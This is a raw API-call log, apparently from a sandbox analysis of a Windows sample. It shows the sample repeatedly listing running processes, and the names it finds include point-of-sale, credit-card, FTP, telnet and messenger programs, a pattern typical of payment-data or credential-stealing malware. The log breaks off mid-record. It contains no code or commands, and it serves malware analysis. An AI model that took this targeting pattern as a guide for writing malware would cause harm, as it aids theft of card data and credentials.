Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0214.984] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0214.986] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0214.988] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0214.989] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0214.991] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0214.992] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0214.994] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0215.035] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0215.037] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0215.040] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0215.042] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0215.047] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0215.048] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0215.050] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0215.051] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0215.053] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0215.055] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0215.060] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0215.063] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0215.065] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0215.066] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0215.068] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0215.070] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.071] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0215.126] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0215.129] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0215.131] CloseHandle (hObject=0xde8) returned 1 [0215.131] Sleep (dwMilliseconds=0x64) [0215.250] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0215.265] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0215.268] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0215.270] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0215.275] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.277] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0215.279] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0215.281] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0215.283] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0215.285] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0215.287] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.289] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.291] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0215.330] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.332] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.334] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.336] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.339] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.345] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.347] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.349] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0215.351] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0215.353] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0215.358] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.360] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.362] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0215.364] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0215.366] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0215.368] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0215.390] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0215.392] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0215.394] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0215.396] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.398] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0215.401] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0215.406] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0215.408] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0215.410] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0215.412] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0215.414] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0215.416] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0215.422] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0215.424] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0215.426] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0215.429] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0215.431] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0215.484] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0215.486] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0215.488] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0215.490] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0215.492] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0215.494] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0215.550] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0215.557] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0215.562] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0215.570] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0215.589] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0215.596] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, 